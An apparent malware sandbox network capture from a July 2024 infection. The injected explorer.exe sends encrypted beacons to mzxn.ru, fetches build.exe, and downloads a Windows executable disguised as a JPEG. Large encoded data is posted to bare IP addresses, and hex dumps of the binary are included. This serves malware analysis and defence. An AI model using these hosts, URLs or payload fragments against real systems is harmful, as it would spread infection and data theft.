34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50713	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:26.765336990 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://njjerjslsvwgqvn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: mzxn.ru
Jul 27, 2024 08:54:26.765348911 CEST	338	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 49 01 e2 a2 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuIhKrDJso6j=nz[0ESl@BJ]DV)~_$&2):RF}7T^tdTN{O"(@xx~?\|
Jul 27, 2024 08:54:27.938688993 CEST	188	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50714	109.172.114.212	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:27.947453976 CEST	162	OUT	GET /build.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 109.172.114.212

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50744	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:49.404920101 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uhrlndgkepvaqel.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 303 Host: mzxn.ru
Jul 27, 2024 08:54:49.404946089 CEST	303	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 26 0b ea 83 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vu&,iOIg039j>>J(Oj?a2LCKM4,33fMmEynQvIS)o
Jul 27, 2024 08:54:50.578445911 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50804	190.12.87.61	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:56:04.372081995 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jpegpuimxnr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: mzxn.ru
Jul 27, 2024 08:56:04.372081995 CEST	223	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 55 b9 aa Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA .[k,vu"U?Uhq(~VQg1lu5I;"A%F;<k^USl~w\ 3? ^-$HF7fz[

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50695	185.149.100.242	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:08 UTC	179	OUT	GET /wp-content/images/pic1.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-07-27 06:54:08 UTC	452	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Sat, 03 Aug 2024 06:54:08 GMT content-type: image/jpeg last-modified: Wed, 24 Jul 2024 11:31:45 GMT accept-ranges: bytes content-length: 11672576 date: Sat, 27 Jul 2024 06:54:08 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-27 06:54:08 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 2c 49 00 00 18 b2 00 00 80 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 bc 00 00 04 00 00 a4 34 b2 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$,I@4`
2024-07-27 06:54:08 UTC	16384	IN	Data Raw: 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c2 cc cc 49 3b 66 10 0f 86 83 00 00 00 55 48 89 e5 48 83 ec 18 f3 0f 10 00 0f 57 c9 0f 2e c1 75 04 66 90 7b 4a 0f 2e c0 75 02 7b 33 48 89 5c 24 30 e8 cd 34 06 00 48 8b 4c 24 30 48 31 c8 48 b9 21 a6 56 6a a1 6e 75 00 48 31 c8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 b9 04 00 00 00 e8 5a 85 06 00 48 83 c4 18 5d c3 48 b8 21 a6 56 6a a1 6e 75 00 48 31 d8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 44 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 55 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: I;fvUHHHHHH`H]HD$H\$gHD$H\$I;fUHHW.uf{J.u{3H\$04HL$0H1H!VjnuH1HckRHH]ZH]H!VjnuH1HckRHH]HD$H\$DgHD$H\$U
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: e8 1b 2e 03 00 48 8d 05 0e df 65 00 bb 08 00 00 00 e8 8a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 34 03 00 e8 36 30 03 00 e8 51 2e 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 00 48 89 4c 24 18 e8 db 2d 03 00 48 8d 05 d6 de 65 00 bb 08 00 00 00 e8 4a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 e0 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 9e de 65 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 e8 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 66 de 65 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 f0 00 00 00 48 89 4c 24 Data Ascii: .He6HD$D460Q.HD$0HHL$-HeJ6HD$D4/.HD$0HHL$-He6HD$D{4/-HD$0HHL$[-Hfe5HD$D;4v/-HD$0HHL$
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: 48 c1 e3 10 48 89 ce 81 e1 ff ff 07 00 48 09 cb 48 89 d9 48 c1 fb 13 48 c1 e3 03 90 90 90 66 90 48 39 da 74 05 eb 23 48 89 f0 48 8b 18 48 89 1a 48 89 c6 48 89 d8 f0 48 0f b1 0e 0f 94 c3 66 90 84 db 74 e3 48 83 c4 30 5d c3 48 89 54 24 28 48 89 74 24 18 48 89 4c 24 10 48 89 5c 24 20 66 90 e8 bb ed 02 00 48 8d 05 4a 2d 67 00 bb 2c 00 00 00 e8 2a f6 02 00 48 8b 44 24 28 0f 1f 44 00 00 e8 9b f5 02 00 48 8d 05 68 87 65 00 bb 05 00 00 00 e8 0a f6 02 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b f4 02 00 48 8d 05 ce 9e 65 00 bb 08 00 00 00 e8 ea f5 02 00 48 8b 44 24 10 0f 1f 44 00 00 e8 5b f4 02 00 48 8d 05 44 a7 65 00 bb 09 00 00 00 e8 ca f5 02 00 48 8b 44 24 20 0f 1f 44 00 00 e8 3b f5 02 00 e8 76 ef 02 00 e8 91 ed 02 00 48 8d 05 45 ca 65 00 bb 0c 00 00 00 0f 1f 44 00 Data Ascii: HHHHHHfH9t#HHHHHHftH0]HT$(Ht$HL$H\$ fHJ-g,*HD$(DHheHD$D{HeHD$D[HDeHD$ D;vHEeD
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: 24 60 0f b7 7e 52 48 0f af cf 48 c1 e8 38 48 03 4b 10 3c 05 73 03 83 c0 05 48 89 4c 24 40 88 44 24 1f 48 89 ca eb 43 8b 50 54 0f ba e2 04 72 06 31 c0 31 db eb 0f 48 8b 40 30 48 89 cb 0f 1f 00 e8 9b 46 ff ff 48 85 c0 75 06 48 83 c4 50 5d c3 74 04 48 8b 40 08 e8 65 87 02 00 0f b7 7e 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 74 09 48 89 4c 24 48 31 ff eb 36 0f b6 4b 08 0f 1f 40 00 f6 c1 04 75 16 48 8d 05 25 fa 65 00 bb 15 00 00 00 e8 ca 93 02 00 48 8b 5c 24 68 0f b6 43 08 83 e0 fb 88 43 08 48 83 c4 50 5d c3 48 ff c7 48 83 ff 08 73 a7 44 0f b6 04 0f 44 38 c0 74 09 66 90 45 84 c0 75 e6 eb b1 48 89 7c 24 20 44 0f b6 46 50 4c 0f af c7 49 8d 0c 08 48 8d 49 08 44 8b 46 54 48 89 4c 24 38 41 0f ba e0 00 73 05 4c 8b 01 eb 03 49 89 c8 48 8b 4e 30 48 8b 51 18 48 8b Data Ascii: $`~RHH8HK<sHL$@D$HCPTr11H@0HFHuHP]tH@e~RH<HHHtHL$H16K@uH%eH\$hCCHP]HHsDD8tfEuH\|$ DFPLIHIDFTHL$8AsLIHN0HQH
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: 24 68 48 8b 11 48 8d 72 ff 48 89 31 48 83 fa 01 75 0d e8 29 35 05 00 48 8b 4c 24 68 89 41 0c 48 89 cb e9 8d fe ff ff 48 83 fa 08 73 65 41 84 01 41 c6 04 11 00 48 85 d2 75 0a 4d 39 d1 74 be 4c 89 d0 eb 29 48 ff ca 48 83 fa 08 73 10 41 84 01 42 0f b6 34 0a 40 80 fe 01 74 cc eb a0 48 89 d0 b9 08 00 00 00 e8 d6 8a 05 00 49 89 d2 0f b7 57 52 4c 89 d6 4a 8d 14 12 48 8d 52 f8 48 8b 12 90 49 39 d1 75 e5 49 89 c2 ba 07 00 00 00 49 89 f1 eb b5 48 89 d0 b9 08 00 00 00 e8 a1 8a 05 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 67 67 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 ce fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5f 55 48 89 e5 48 83 ec 18 0f b6 53 08 0f b6 73 09 f6 c2 08 75 02 ff ce 48 89 Data Ascii: $hHHrH1Hu)5HL$hAHHseAAHuM9tL)HHsAB4@tHIWRLJHRHI9uIIHHD$H\$HL$H\|$ ggHD$H\$HL$H\|$ I;fv_UHHSsuH
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: 00 f2 0f 10 05 47 55 70 00 f2 0f 11 02 b8 01 00 00 00 eb 2c 48 81 c4 08 02 00 00 5d c3 4c 8b 0d 7c 61 ac 00 41 ff c0 45 0f b7 c0 0f 57 c0 f2 41 0f 2a c0 f2 41 0f 11 04 c1 48 ff c0 0f 1f 40 00 48 83 f8 44 7d 1f 48 8b 0d 5b 61 ac 00 48 8d 15 6c 3d 48 00 44 0f b7 04 42 48 39 c8 72 bf 66 90 e9 4d 17 00 00 48 8b 0d 44 61 ac 00 48 8b 1d 35 61 ac 00 48 ff c3 48 8b 05 23 61 ac 00 0f 1f 00 48 39 d9 73 3b bf 01 00 00 00 48 8d 35 2f 0e 57 00 e8 6a 75 03 00 48 89 0d 13 61 ac 00 83 3d 6c 0e b5 00 00 74 13 e8 d5 46 05 00 49 89 03 48 8b 0d eb 60 ac 00 49 89 4b 08 48 89 05 e0 60 ac 00 48 89 1d e1 60 ac 00 f2 0f 10 05 d1 55 70 00 f2 0f 11 44 d8 f8 e8 66 25 ff ff 48 89 1d e7 60 ac 00 48 89 0d e8 60 ac 00 83 3d 21 0e b5 00 00 74 13 e8 8a 46 05 00 49 89 03 48 8b 15 c0 60 ac Data Ascii: GUp,H]L\|aAEWA*AH@HD}H[aHl=HDBH9rfMHDaH5aHH#aH9s;H5/WjuHa=ltFIH`IKH`H`UpDf%H`H`=!tFIH`
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: 29 d1 ff c1 d1 e1 48 8d 15 77 c9 b4 00 f0 0f b1 0a 0f 94 c1 84 c9 74 c7 90 8b 05 15 37 ac 00 89 c1 81 e1 00 00 00 80 85 c9 75 21 8d 50 01 48 8d 35 ff 36 ac 00 f0 0f b1 16 0f 94 c2 0f 1f 40 00 84 d2 74 d4 8b 15 36 e9 ad 00 eb 06 8b 15 2e e9 ad 00 89 8c 24 a4 00 00 00 89 94 24 a0 00 00 00 0f b6 74 24 26 40 84 f6 74 04 85 c9 eb 14 85 c9 0f 85 f3 08 00 00 40 84 f6 74 0d 0f 1f 44 00 00 85 c9 0f 84 d0 08 00 00 44 0f 11 bc 24 78 01 00 00 c6 84 24 88 01 00 00 00 48 c7 84 24 90 01 00 00 00 00 00 00 48 8d 05 94 09 00 00 48 89 84 24 78 01 00 00 48 8b 84 24 a8 00 00 00 48 89 84 24 80 01 00 00 0f b6 44 24 3f 88 84 24 88 01 00 00 48 8b 84 24 30 01 00 00 48 89 84 24 90 01 00 00 48 8d 84 24 78 01 00 00 48 89 04 24 e8 0f e6 04 00 45 0f 57 ff 4c 8b 35 f4 cb b4 00 65 4d 8b Data Ascii: )Hwt7u!PH56@t6.$$t$&@t@tDD$x$H$HH$xH$H$D$?$H$0H$H$xH$EWL5eM
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: df 48 8d b4 24 a0 00 00 00 bb 08 00 00 00 48 89 d0 e8 ca 0e 00 00 48 8b 84 24 30 01 00 00 48 8d 7c 24 40 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 cd 04 00 48 8b 6d 00 48 c7 c3 ff ff ff ff 48 89 d9 48 89 cf 48 89 c6 45 31 c0 48 8d 44 24 40 e8 49 d2 03 00 e9 d5 00 00 00 0f 1f 40 00 83 fa 06 75 0b 31 c0 48 81 c4 20 01 00 00 5d c3 90 8b 88 90 00 00 00 89 c9 48 89 8c 24 08 01 00 00 48 8b 90 98 00 00 00 48 89 94 24 00 01 00 00 e8 8b ad 01 00 48 8d 05 23 8b 64 00 bb 0c 00 00 00 e8 fa b5 01 00 48 8b 84 24 30 01 00 00 e8 6d b5 01 00 48 8d 05 ce 55 64 00 bb 07 00 00 00 90 e8 db b5 01 00 48 8b 84 24 00 01 00 00 e8 0e b3 01 00 48 8d 05 62 df 64 00 bb 13 00 00 00 66 90 e8 bb b5 01 00 48 8b 84 24 08 01 00 00 e8 ee b2 01 00 e8 69 af 01 00 e8 84 ad 01 00 48 8d 05 Data Ascii: H$HH$0H\|$@HHl$Hl$HmHHHHE1HD$@I@u1H ]H$HH$H#dH$0mHUdH$HbdfH$iH
2024-07-27 06:54:09 UTC	16384	IN	Data Raw: eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 84 01 00 00 55 48 89 e5 48 83 ec 20 48 89 44 24 30 84 00 90 e8 21 82 fe ff 4c 89 f1 48 8b 44 24 30 48 39 48 08 0f 85 4b 01 00 00 90 e8 69 84 fe ff 0f 57 c0 31 c0 eb 06 0f 10 c1 48 89 c8 f2 0f 10 0d 2c 96 6f 00 66 0f 2e c8 0f 86 f0 00 00 00 f2 0f 11 44 24 18 48 89 44 24 10 48 8b 44 24 30 48 8b 90 90 00 00 00 48 8b 0a ff d1 84 c0 0f 85 bf 00 00 00 48 8b 4c 24 30 48 8b 91 88 00 00 00 48 8b 1a b8 00 00 01 00 ff d3 48 85 db 75 5e 48 8b 0d c4 49 b4 00 0f 1f 40 00 48 85 c9 0f 84 ce 00 00 00 48 89 c2 48 89 d3 31 d2 48 f7 f1 48 85 c0 7c 0a 0f 57 c9 f2 48 0f 2a c8 eb 18 48 89 c1 83 e0 01 48 d1 e9 48 09 c1 0f 57 c9 f2 48 0f 2a c9 f2 0f 58 c9 f2 0f 10 15 Data Ascii: I;fUHH HD$0!LHD$0H9HKiW1H,of.D$HD$HD$0HHHL$0HHHu^HI@HHH1HH\|WHHHHWHX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50696	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:13 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 8179
2024-07-27 06:54:13 UTC	8179	OUT	Data Raw: 56 6a 75 34 54 43 67 65 75 76 31 76 73 2f 34 30 49 70 44 50 6f 65 52 6d 4f 58 74 70 38 71 31 50 2b 31 4a 44 4d 5a 4d 4e 72 37 38 79 69 6c 52 4d 71 4b 58 62 48 56 36 5a 48 50 62 7a 6d 54 2b 4e 66 77 6f 35 6c 39 38 61 78 72 4c 4f 6f 6d 39 31 46 73 45 37 71 77 36 71 76 41 77 36 33 43 69 61 53 34 33 59 68 45 4b 50 6d 4b 39 5a 79 51 56 44 59 76 5a 47 65 53 64 4d 52 43 31 4b 72 4f 65 78 50 39 51 47 33 55 75 6e 70 71 65 57 6c 7a 7a 6d 31 7a 51 77 74 52 56 61 46 56 4a 6a 46 32 76 6f 4c 49 54 7a 37 42 62 49 7a 4e 31 78 41 34 64 45 4a 5a 43 56 51 55 2f 61 48 32 54 44 6b 31 4c 58 50 63 4c 50 37 41 76 63 36 2b 4e 76 39 67 54 39 68 59 33 49 5a 44 63 72 2f 5a 6e 5a 37 56 74 62 75 74 67 4d 51 32 4c 58 4c 6f 4b 37 35 7a 61 36 50 4e 73 42 4f 46 4d 46 50 39 64 46 77 36 4e Data Ascii: Vju4TCgeuv1vs/40IpDPoeRmOXtp8q1P+1JDMZMNr78yilRMqKXbHV6ZHPbzmT+Nfwo5l98axrLOom91FsE7qw6qvAw63CiaS43YhEKPmK9ZyQVDYvZGeSdMRC1KrOexP9QG3UunpqeWlzzm1zQwtRVaFVJjF2voLITz7BbIzN1xA4dEJZCVQU/aH2TDk1LXPcLP7Avc6+Nv9gT9hY3IZDcr/ZnZ7VtbutgMQ2LXLoK75za6PNsBOFMFP9dFw6N
2024-07-27 06:54:14 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 733 Date: Sat, 27 Jul 2024 06:54:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:14 UTC	733	IN	Data Raw: 59 44 79 47 49 5a 70 66 34 53 70 50 50 30 57 55 35 50 59 4b 43 69 79 70 58 36 55 67 37 43 33 77 35 4a 76 6a 4b 43 69 58 5a 57 48 67 65 70 50 53 72 45 51 4c 6f 4b 70 78 44 63 50 4a 6f 69 44 37 34 6c 76 59 7a 65 57 56 44 43 66 6c 4b 2f 47 6e 6f 63 78 4f 4b 46 79 35 55 42 70 4a 4d 54 6f 64 31 6a 6e 46 46 62 73 48 2b 48 6c 77 4a 4c 35 35 53 33 59 64 43 2f 62 43 64 56 71 42 72 67 70 66 35 4b 49 46 4b 76 63 4d 36 34 57 2b 4d 72 5a 77 43 41 56 58 33 4f 38 31 32 4e 2f 62 6b 74 54 4a 4a 77 42 4c 67 4f 49 56 34 36 42 4a 4f 4f 55 4c 67 68 6b 53 55 6c 78 35 31 50 79 36 39 6e 32 2b 48 4c 79 73 41 4e 7a 59 33 49 4e 50 73 44 64 6a 71 31 2b 39 78 49 39 41 38 34 62 6f 6a 6b 48 6a 4d 73 68 71 52 35 45 4c 6d 48 4d 57 4a 73 59 44 44 55 4a 4a 67 41 66 7a 31 31 53 45 71 71 6b Data Ascii: YDyGIZpf4SpPP0WU5PYKCiypX6Ug7C3w5JvjKCiXZWHgepPSrEQLoKpxDcPJoiD74lvYzeWVDCflK/GnocxOKFy5UBpJMTod1jnFFbsH+HlwJL55S3YdC/bCdVqBrgpf5KIFKvcM64W+MrZwCAVX3O812N/bktTJJwBLgOIV46BJOOULghkSUlx51Py69n2+HLysANzY3INPsDdjq1+9xI9A84bojkHjMshqR5ELmHMWJsYDDUJJgAfz11SEqqk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50697	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:15 UTC	236	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 155659
2024-07-27 06:54:15 UTC	16148	OUT	Data Raw: 57 36 46 31 7a 71 57 72 7a 77 49 33 4c 78 51 78 30 75 75 45 2b 47 4a 74 39 61 34 63 41 58 6c 75 68 6b 68 38 2b 7a 2f 69 4b 41 49 43 59 58 61 4e 58 42 64 55 37 4e 6b 51 31 53 71 74 62 71 2b 4f 31 39 6f 66 42 2f 6c 34 63 35 4d 35 59 42 64 32 54 6b 6b 2f 48 62 4d 66 32 63 73 31 7a 38 6b 46 68 36 54 38 62 39 37 4c 56 63 47 6c 54 39 4c 71 61 35 6a 71 50 41 70 35 75 4e 37 67 45 55 4f 71 79 2b 4d 79 48 72 64 77 74 57 57 50 4d 48 2b 75 42 34 38 2f 39 67 6c 4c 58 47 43 51 4b 43 4d 6c 5a 55 69 65 4c 41 2b 6f 51 34 64 50 36 57 4d 6e 69 7a 4f 35 31 34 6b 37 33 54 4e 53 73 4b 68 36 64 68 6b 31 7a 49 32 42 6c 69 49 36 69 4b 62 37 42 76 77 6e 57 34 39 6f 48 38 54 6d 7a 39 47 75 79 42 53 57 53 76 50 4c 44 65 65 79 36 36 6b 75 41 4d 47 38 6d 54 66 35 48 54 38 62 76 31 4c Data Ascii: W6F1zqWrzwI3LxQx0uuE+GJt9a4cAXluhkh8+z/iKAICYXaNXBdU7NkQ1Sqtbq+O19ofB/l4c5M5YBd2Tkk/HbMf2cs1z8kFh6T8b97LVcGlT9Lqa5jqPAp5uN7gEUOqy+MyHrdwtWWPMH+uB48/9glLXGCQKCMlZUieLA+oQ4dP6WMnizO514k73TNSsKh6dhk1zI2BliI6iKb7BvwnW49oH8Tmz9GuyBSWSvPLDeey66kuAMG8mTf5HT8bv1L
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 68 65 4d 48 54 61 74 79 59 69 2b 39 6a 61 54 65 79 53 4a 4f 78 4c 4a 37 72 34 52 6a 73 4f 74 4e 6e 44 30 34 78 53 6b 38 47 75 46 31 63 65 4b 63 53 71 63 57 34 6b 45 35 75 51 32 37 33 69 41 65 51 36 52 38 38 69 46 34 73 56 6d 34 30 31 36 75 4b 47 4d 63 57 63 52 48 78 2b 75 77 66 46 30 63 4b 34 34 49 49 74 4e 4d 30 48 38 71 62 4e 6c 54 58 38 65 69 4f 6a 2f 2b 62 33 53 52 30 7a 50 73 42 2b 62 76 65 6c 41 6f 36 50 46 75 66 68 6d 30 7a 49 50 50 46 50 79 33 44 6b 7a 4f 72 52 7a 42 45 43 57 56 75 44 73 36 38 33 52 54 7a 4e 75 35 50 77 47 39 6b 74 44 76 74 65 33 62 37 38 30 41 47 52 73 39 35 4c 61 56 48 6a 74 45 69 57 4b 34 75 78 31 64 51 56 74 53 4b 6e 67 30 56 68 62 59 65 6f 6d 78 4f 33 6a 2b 31 71 62 74 72 7a 57 6a 4a 39 48 79 67 34 61 4c 44 37 6d 54 49 32 55 Data Ascii: 